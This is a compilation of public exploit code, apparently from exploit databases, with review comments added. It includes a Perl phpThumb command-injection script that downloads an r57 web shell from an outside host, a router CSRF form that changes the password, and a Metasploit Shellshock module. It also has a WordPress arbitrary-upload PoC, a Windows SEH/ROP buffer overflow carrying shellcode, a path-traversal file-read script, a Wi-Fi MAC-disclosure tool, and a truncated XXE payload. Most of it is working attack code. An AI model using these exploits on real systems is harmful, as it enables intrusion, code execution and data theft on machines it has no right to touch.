    print "======================================================\n";
    sleep(0.8);
    print "Usage: perl exploit.pl <target> \n";
    exit(1);
}
# Prepend a scheme if the user left it out (https targets are rewritten too).
if ($target !~ /http:\/\//)
{
    $target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(1.1);
print "[*] Testing exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
# NOTE(review): this listing is line-wrapped. The user-agent string below (and
# the URL literals further down) span two or more lines as printed and would
# therefore contain embedded newlines; each was presumably a single line.
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
# Command injected on the server: fetch a web shell from a third party.
# NOTE(review): the fetched shell is untrusted code from an unrelated host;
# whatever it does on the target (or phones home to) is outside this script's
# control.
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
# phpThumb's fltr[] parameter ends up on an ImageMagick command line; the
# `; $shell ;` separators inject the wget. Note the doubled "??" before src=.
$website =
"$target/components/com_alphacontent/assets/phpThumb/phpThumb.php??src=file.jpg&fltr
[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
# is_success only says the HTTP request returned 2xx, not that the injection ran.
if ($request->is_success)
{
    print "[+] Exploit sent with success. \n";
    sleep(1.4);
}
else
{
    print "[-] Exploit sent but probably the website is not vulnerable. \n";
    sleep(1.3);
}
print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);
$cwebsite =
"$target/components/com_alphacontent/assets/phpThumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success)
{
    print "[+] Txt Shell uploaded :) \n";
    sleep(1);
    print "[*] Moving it to PHP format... Please wait... \n";
    sleep(1.1);
    # Second injection: rename the downloaded file so the server executes it.
    $mvwebsite =
    "$target/components/com_alphacontent/assets/phpThumb/phpThumb.php?
src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;
&phpThumbDebug=9";
    $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
    $cwebsite =
    "$target/components/com_alphacontent/assets/phpThumb/shell.php";
    $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
    if ($c2req->is_success)
    {
        print "[+] PHP Shell uploaded => $cwebsite :) \n";
        sleep(0.8);
        print "[*] Do you want to open it? (y/n) => ";
        $open = <STDIN>;
        # NOTE(review): `==` is a numeric comparison; both "y\n"/"n\n" and "y"
        # numify to 0, so this branch is taken for any input. The intended
        # test is `chomp($open); if ($open eq "y")`.
        if ($open == "y")
        {
            $firefox = "firefox $cwebsite";
            system($firefox);
        }
    }
    else
    {
        print "[-] Error while moving shell from txt to PHP :( \n";
        exit(1);
    }
}
else
{
    print "[-] Txt shell not uploaded. :( \n";
}
source: https://www.securityfocus.com/bid/63908/info
LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
<!-- CSRF PoC: a victim who is logged in to the router and clicks the button
     submits this form to /cgi-bin/pass; the request carries no anti-CSRF
     token, and the router does not check the Referer. www.example.com stands
     in for the router's address. The page does not auto-submit. -->
<html>
<body>
<form action="http://www.example.com/cgi-bin/pass" method="POST">
<!-- Field meanings are not documented here. From the names and the advisory
     (unauthorized administrative actions) these presumably set the admin
     password to 1234567 with P1 as the confirmation -- verify against the
     device's own password form. -->
<input type="hidden" name="rc" value="@" />
<input type="hidden" name="Pa" value="1234567" />
<input type="hidden" name="P1" value="1234567" />
<input type="hidden" name="rd" value="atbox" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/63880/info
Thomson Reuters Velocity Analytics is prone to a vulnerability that lets attackers inject and execute arbitrary code.
Successfully exploiting this issue may allow an attacker to upload and execute arbitrary code with SYSTEM privileges.
Thomson Reuters Velocity Analytics 6.94 build 2995 is vulnerable; other versions may also be affected.
http://www.example.com/VhttpdMgr?action=importFile&fileName={BACKDOOR}
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
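# Shellshock (CVE-2014-6271) against the Boa-served ping.sh CGI on Advantech
# switches. The injected command is carried in the User-Agent header, which
# the CGI environment exposes to bash as HTTP_USER_AGENT.
class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
      'Description'    => %q{
        This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
        handles external environment variables. This module targets the 'ping.sh' CGI
        script, acessible through the Boa web server on Advantech switches. This module
        was tested against firmware version 1322_D1.98.
      },
      'Author'         => 'hdm',
      'References'     => [
        ['CVE', '2014-6271'],
        ['CWE', '94'],
        ['OSVDB', '112004'],
        ['EDB', '34765'],
        ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Privileged'     => false,
      'Arch'           => ARCH_CMD,
      'Platform'       => 'unix',
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00\x0A\x0D",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'openssl generic'
            }
        },
      'Targets'        => [[ 'Automatic Targeting', { 'auto' => true } ]],
      'DefaultTarget'  => 0,
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Dec 01 2015'
    ))

    register_options([
      Opt::RPORT(80)
    ], self.class)
  end

  #
  # CVE-2014-6271: wrap +cmd+ in a bash function definition whose trailing
  # statement is executed when the variable is imported. The command is
  # backgrounded, so nothing comes back in the HTTP response; the payload has
  # to open its own channel (hence the cmd/openssl/generic requirement above).
  #
  def cve_2014_6271(cmd)
    %{() { :;}; $(#{cmd}) & }
  end

  #
  # Fingerprint: a Boa Server header and a ping.sh response body that contains
  # the ping statistics line. Plain GET of ping.sh makes the device ping
  # 127.0.0.1; no credentials are involved.
  #
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/cgi-bin/ping.sh'
    )

    if !res
      vprint_error("#{peer} - No response from host")
      return Exploit::CheckCode::Unknown
    elsif res.headers['Server'] =~ /Boa\/(.*)/
      vprint_status("#{peer} - Found Boa version #{$1}")
    else
      print_status("#{peer} - Target is not a Boa web server")
      return Exploit::CheckCode::Safe
    end

    if res.body.to_s.index('127.0.0.1 ping statistics')
      return Exploit::CheckCode::Detected
    else
      vprint_error("#{peer} - Target does not appear to be an Advantech switch")
      # Was a misspelled constant (Expoit::...), which raised NameError on this
      # branch instead of returning Safe.
      return Exploit::CheckCode::Safe
    end
  end

  #
  # Send the encoded payload in the User-Agent header of a GET to ping.sh.
  # The response is not inspected: the command runs in the background.
  #
  def exploit
    cmd = cve_2014_6271(payload.encoded)
    vprint_status("#{peer} - Trying to run command '#{cmd}'")
    send_request_cgi(
      'method' => 'GET',
      'uri'    => '/cgi-bin/ping.sh',
      'agent'  => cmd
    )
  end
end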
source: https://www.securityfocus.com/bid/63836/info
The Suco theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
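<?php
// Upload PoC for the Suco theme's themify-ajax.php handler: POSTs a local
// file as the multipart field "Filedata" and prints the server's response.
// 127.0.0.1 stands in for the target host.
$uploadfile = "devilscream.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
// The "@file" upload syntax is deprecated since PHP 5.5 (off by default from
// 5.6 via CURLOPT_SAFE_UPLOAD) and removed in 7.0, where it sends the literal
// string "@devilscream.php" instead of the file. Use CURLFile when available
// and keep the old form for older interpreters.
$filedata = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => $filedata));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>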
#!/usr/bin/env python
#
# Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP)
# Date: 29/11/2015
# Exploit Author: Knaps
# Contact: @TheKnapsy
# Website: http://blog.knapsy.com
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows 7 x64, but should work on any other Windows platform
#
# Notes:
# - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/)
# - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :)
# - bad chars: '\x00' and '\x3b'
# - max shellcode size allowed: 1260 bytes
#
import sys, socket, struct
# ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy)
# Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP.
def create_rop_chain():
    """Return the packed ROP chain that turns DEP off before the shellcode runs.

    The chain is a list of little-endian DWORDs (gadget addresses and the
    immediates they pop) joined into one byte string. Control reaches it via
    the SEH stack pivot set up at the top level and, as the generator comment
    says, it ends in PUSHAD so that the register values built here become the
    VirtualProtect() arguments. EDX is zeroed and then incremented 64 times
    (0x40), so the exact number of repeated INC EDX entries is load-bearing:
    do not collapse, deduplicate or reorder the list.

    Every address is a fixed offset into ImageLoad.dll or sqlite3.dll, so the
    chain only works if those modules load at their preferred base — i.e. they
    are presumably not ASLR-enabled builds, which is why they were chosen.

    Defender notes: those non-relocatable module addresses are the weak point
    of the technique. Rebuilding the DLLs with /DYNAMICBASE or forcing ASLR
    through process mitigation policy invalidates every entry below without
    any change to the application's own code.
    """
    rop_gadgets = [
        # Generate value of 201 in EAX
        0x10015442, # POP EAX # RETN [ImageLoad.dll]
        0xFFFFFDFF, # Value of '-201'
        0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
        # Put EAX into EBX (other unnecessary stuff comes with this gadget as well...)
        0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
        # Carry on with the ROP as generated by mona.py
        0x10015442, # POP EAX # RETN [ImageLoad.dll]
        0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
        # Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location
        # used solely by the remaining part of the above gadget (it doesn't really do anything for us)
        0x1001281a, # ADD ESP,4 # RETN [ImageLoad.dll]
        0x61c73281, # &Writable location [sqlite3.dll]
        # And carry on further as generated by mona.py
        0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
        0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll]
        0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll]
        0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
        0x10013ad6, # POP EBP # RETN [ImageLoad.dll]
        0x61c227fa, # & push esp # ret [sqlite3.dll]
        0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]
        # Now bunch of ugly increments... unfortunately couldn't find anything nicer :(
        # (64 repetitions: EDX ends up as 0x40; the ADD CL,CL side effect is harmless because ECX is reloaded below)
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
        0x1001b4f6, # POP ECX # RETN [ImageLoad.dll]
        0x61c73281, # &Writable location [sqlite3.dll]
        0x100194b3, # POP EDI # RETN [ImageLoad.dll]
        0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
        0x10015442, # POP EAX # RETN [ImageLoad.dll]
        0x90909090, # nop
        0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
    ]
    # Python 2: struct.pack returns str, so ''.join is valid here.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
# Check command line args
# NOTE(review): only the presence of one argument is checked, but sys.argv[2]
# is read a few lines below; running with just a host raises IndexError
# instead of printing this usage line.
if len(sys.argv) <= 1:
    print "Usage: python poc.py [host] [port]"
    exit()
host = sys.argv[1]
port = int(sys.argv[2])
# Offsets, in bytes from the start of the UserID cookie value, for v7.2:
# where the ROP chain starts, the total request size, where the SEH record is
# overwritten, and where the DWORD that ends up in EAX lands.
rop_offset = 2455
max_size = 5000
seh_offset = 4059
eax_offset = 4183
# move ESP out of the way so the shellcode doesn't corrupt itself during execution
# metasm > add esp,-1500
shellcode = "\x81\xc4\x24\xfa\xff\xff"
# Just as a PoC, spawn calc.exe. Replace with any other shellcode you want
# (maximum size of shellcode allowed: 1260 bytes)
#
# msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python
# Payload size: 220 bytes
# The bytes below are encoder output (bad characters \x00 and \x3b excluded)
# and are opaque; they must be kept exactly as generated.
shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31"
shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5"
shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96"
shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1"
shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde"
shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68"
shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5"
shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f"
shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9"
shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96"
shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28"
shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40"
shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a"
shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed"
shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce"
shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3"
shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85"
# Buffer layout: padding | ROP chain | shellcode | padding | nSEH | SEH handler | padding | EAX value | padding
buffer = "A" * rop_offset # padding
buffer += create_rop_chain()
buffer += shellcode
buffer += "A" * (seh_offset - len(buffer)) # padding
buffer += "BBBB" # overwrite nSEH pointer (filler: the handler below pivots ESP rather than returning here)
buffer += struct.pack("<I", 0x1002280a) # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])
buffer += "A" * (eax_offset - len(buffer)) # padding
buffer += struct.pack("<I", 0xffffffff) # overwrite EAX to always trigger an exception
buffer += "A" * (max_size - len(buffer)) # padding
# The entire buffer travels in the UserID cookie of a single GET; nothing else
# in the request is unusual. Defender note: a ~5 KB Cookie header on
# /changeuser.ghp is the observable artefact of this exploit family, and a
# request-size limit on that path is a cheap compensating control.
httpreq = (
    "GET /changeuser.ghp HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Host:" + host + ":" + str(port) + "\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Referer: http://" + host + "/\r\n"
    "Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
    "Conection: Keep-Alive\r\n\r\n"  # (sic) header name misspelled in the original request; kept verbatim
)
# Send payload to the server — fire and forget, the response is never read
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(httpreq)
s.close()
source: https://www.securityfocus.com/bid/63771/info
Limonade framework is prone to a local file-disclosure vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Limonade framework 3.0 vulnerable; other versions may also be affected.
<?php
/** Disable the script time-out: the loop below issues up to ten HTTP requests **/
set_time_limit(0);
/** Silence all PHP notices/warnings (this also hides missing-argument errors) **/
error_reporting(0);
/** Positional CLI arguments: target URL, a "param:file" pair, and the string whose
    presence in the response is treated as success. No count check is done, so a
    missing argument silently becomes null. **/
$url = $argv[1];
$data = $argv[2];
$needle = $argv[3];
/** Curl function with appropriate adjustments **/
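/**
 * POST $data to $url and return the raw response, headers included.
 *
 * @param string $url  Target URL.
 * @param array  $data Form fields, handed straight to CURLOPT_POSTFIELDS.
 * @return string|false Response (headers + body) or false when curl_exec
 *                      itself fails.
 *
 * Fix: the original placed curl_close() after the return statement, so it
 * never ran and every call leaked its curl handle. The response is now
 * captured, the handle closed, and the value returned afterwards.
 *
 * NOTE(review): CURLOPT_SSL_VERIFYPEER is FALSE, so HTTPS targets are not
 * authenticated and the request is open to interception. Acceptable for a
 * lab PoC against a known host, not for anything carrying real credentials;
 * left as-is to keep behaviour against self-signed test servers.
 */
function CurlPost($url='localhost',$data=array())
{
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
    curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
    curl_setopt($ch,CURLOPT_HEADER,1);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_TIMEOUT,50);
    curl_setopt($ch,CURLOPT_POST,true);
    curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}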
// Split "param:file" into the POST field to inject and the path to request.
list($param,$file) = explode(':',$data);
// Traversal written as "....//": a filter that strips "../" in a single pass
// (presumably what the vulnerable framework does) turns each unit back into
// "../". The server-side fix is to canonicalise the path (realpath) and require
// it to stay under the permitted directory, rather than deleting patterns.
$FilterBypassing = '....//';
// Walk up one directory level per iteration, at most ten levels deep.
for($i=0;$i<10;$i++)
{
    $DataToPost[$param] = $FilterBypassing.$file;
    $response = CurlPost($url,$DataToPost);
    // First response containing $needle is reported and the script stops.
    if(strstr($response,$needle)!==FALSE)
    {
        echo $response;
        echo "\n\nExploited successfully!\n";
        echo 'Payload: ',$DataToPost[$param],"\n\n\n";
        die();
    }
    $FilterBypassing .= '....//';
}
?>
source: https://www.securityfocus.com/bid/63743/info
Linux Kernel is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information like original MAC address; information obtained may aid in other attacks.
Note: This BID was previously titled 'Atheros Wireless Drivers MAC Address Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.
#!/usr/bin/python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import random
# Probe frames injected per MAC bit; the repeats compensate for frame loss on
# the air (a single lost ACK would otherwise be read as "bit unchanged").
ATTEMPTS_PER_BIT = 6
# Seconds to wait for an ACK after each injected probe.
SNIFFTIME = 0.3
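def randmac():
    """Return a random unicast MAC address as a colon-separated hex string.

    Used as the spoofed sender of the probe frames so that the target's ACKs
    (addressed back to this value) can be told apart from other traffic. The
    individual/group bit — the least significant bit of the first octet — is
    cleared so the result is never a multicast or broadcast address.

    Fix: the original used ``random.randint(0, 256)``; randint's upper bound
    is inclusive, so an octet could be 256 and ``format(256, '02x')`` yields
    three hex digits ("100"), producing a malformed address roughly once in
    every 257 octets drawn.
    """
    mac = [random.randint(0, 255) for _ in range(6)]
    mac[0] &= 0xFE  # clear the I/G bit -> unicast
    return ":".join(format(byte, '02x') for byte in mac)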
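def parsemac(macstr):
    """Parse "aa:bb:cc:dd:ee:ff" (":" or "-" separated) into six octet ints.

    Args:
        macstr: MAC address string with ":" or "-" between the octets.

    Returns:
        list of six ints in 0..255, most significant octet first.

    Raises:
        ValueError: when there are not exactly six parts, a part is not
            hexadecimal, or an octet is outside 0..ff. The original only
            checked the part count, so inputs like "fff" passed through and
            produced values above 255 that later broke the bit arithmetic.
    """
    parts = macstr.replace("-", ":").split(":")
    if len(parts) != 6:
        raise ValueError("MAC does not consist of 6 parts (separated by : or -)")
    octets = [int(byte, 16) for byte in parts]
    # Same exception type as the count check so existing callers' handlers apply.
    if any(not 0 <= octet <= 255 for octet in octets):
        raise ValueError("MAC octet out of range 00..ff: %r" % macstr)
    return octets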
def is_ack(p):
    """Return True when *p* is an 802.11 ACK frame (control type 1, subtype 13)."""
    if Dot11 not in p:
        return False
    if p.type != 1:
        return False
    return p.subtype == 13
def find_fixed_bits(s, mac):
    """Recover the target's hardware MAC bit by bit from its ACK behaviour.

    Args:
        s: open scapy L2 socket, used both to inject probes and to sniff.
        mac: list of six ints — the address the target is currently seen
            using. It is modified in place while probing but every bit is
            flipped back, so it is unchanged on return.

    Returns:
        list of six ints: the recovered original octets.

    Method: for each of the 48 bit positions the observed address is flipped
    at that bit and a data frame is sent to the result. If the target ACKs
    that frame, its receiver matched on the flipped value, so the original
    bit is the flipped one; otherwise the observed bit is kept. ACKs are
    matched on addr1 == srcmac (our random sender), so ACKs destined to other
    stations are ignored.

    Defender note (inferred from the advisory text, not from this code): the
    leak exists when a receiver still acknowledges frames addressed to its
    burned-in MAC after a different address has been configured; drivers
    and firmware that filter strictly on the configured address close it.
    """
    # eventually contains the real MAC address
    orgmac = [0] * 6
    # random MAC address, used as sender, to which the target will send an ACK
    srcmac = randmac()
    # for all the bits - FIXME: Don't consider H.O. bit of first MAC byte
    for i in range(6):
        for bit in range(8):
            # flip the bit at current position
            currbit = mac[i] & (1 << bit)
            mac[i] ^= (1 << bit)
            # convert modified mac to string
            strmac = ":".join([format(byte, '02x') for byte in mac])
            print "Probing", strmac, "...",
            replied = False
            for attempt in range(ATTEMPTS_PER_BIT):
                # inject data packet to modified MAC address
                packet = Dot11(type="Data", subtype=4, FCfield="from-DS",
                    addr1=strmac, addr2=srcmac, addr3=strmac)
                s.send(RadioTap()/packet)
                # Sniff air for ACK to modified MAC
                l = sniff(lfilter=lambda p: is_ack(p) and p.addr1 == srcmac, count=1,
                    timeout=SNIFFTIME, opened_socket=s)
                # If we got an ACK, don't need to try again
                if len(l) == 1:
                    replied = True
                    break
            print replied
            # If client replied, original bit is different from the one currently set,
            # otherwise it's equal to original bit.
            if replied:
                orgmac[i] |= (~currbit) & (1 << bit)
            else:
                orgmac[i] |= currbit
            # flip bit back to original value
            mac[i] ^= (1 << bit)
    # Done, return original MAC
    return orgmac
if __name__ == "__main__":
    # Arguments: the monitor-mode interface to use and the target's observed MAC.
    if len(sys.argv) != 3:
        print "Usage:", sys.argv[0], "interface macaddr"
        quit(1)
    try:
        mac = parsemac(sys.argv[2])
        conf.iface = sys.argv[1]
        random.seed()
        # Open up read/write socket so we don't miss the ACK: one socket is
        # used for both injection and sniffing (see find_fixed_bits).
        L2socket = conf.L2socket
        s = L2socket(type=ETH_P_ALL, iface=conf.iface)
        # Now find the MAC
        orgmac = find_fixed_bits(s, mac)
        # NOTE(review): not in a finally block, so the socket stays open if
        # find_fixed_bits raises.
        s.close()
        print "\nReal MAC address:", ":".join(format(byte, "02x") for byte in orgmac), "\n"
    # Python 2 "except X, e" syntax. `sys` and `socket` are not imported
    # explicitly here; presumably they arrive via scapy's star import.
    except ValueError, e:
        print "Invalid MAC address:", e
    except socket.error, e:
        print "Error with provided interface:", e
source: https://www.securityfocus.com/bid/63719/info
IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
IBM Cognos Business Intelligence 10.2.1 and prior are vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!--
  XXE proof of concept. The internal DTD subset declares an external general
  entity whose system identifier is file:///etc/passwd, and the document body
  references it inside <comments>. A parser that resolves external entities
  substitutes the file's contents for &xxe;, and an endpoint that echoes or
  stores the parsed value then discloses the file. The surrounding
  Openbravo/Product elements are only the shape the import expects.

  Mitigation: disable DTD processing (or at least external general entity
  resolution) in the XML parser used by the application, so the &xxe;
